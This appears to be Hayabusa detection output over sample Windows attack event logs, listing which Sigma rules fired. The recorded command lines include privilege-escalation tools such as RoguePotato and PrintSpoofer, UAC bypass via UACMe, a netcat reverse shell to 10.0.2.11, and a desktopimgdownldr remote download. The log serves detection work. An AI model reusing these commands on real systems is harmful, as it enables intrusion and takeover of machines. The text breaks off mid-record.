C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.340 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx +2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx +2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:21:56.661 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx +2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx +2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Direct Syscall of NtOpenProcess,,rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: spooler.exe payload.bin : Path: C:\Users\Public\tools\cinj\spooler.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: chost.exe payload.bin : Path: C:\Users\Public\tools\evasion\chost.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: notepad : Path: C:\Windows\System32\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Conhost Parent Process Executions,,rules/sigma/process_creation/win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr : Path: C:\Windows\System32\desktopimgdownldr.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,Suspicious Desktopimgdownldr Command,,rules/sigma/process_creation/win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Suspicious Desktopimgdownldr Target File,,rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx +2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Download LockScreen Image : URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: explorer.exe /root,""c:\windows\System32\calc.exe"" : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Explorer Root Flag Process Tree Break,,rules/sigma/process_creation/win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Proxy Execution Via 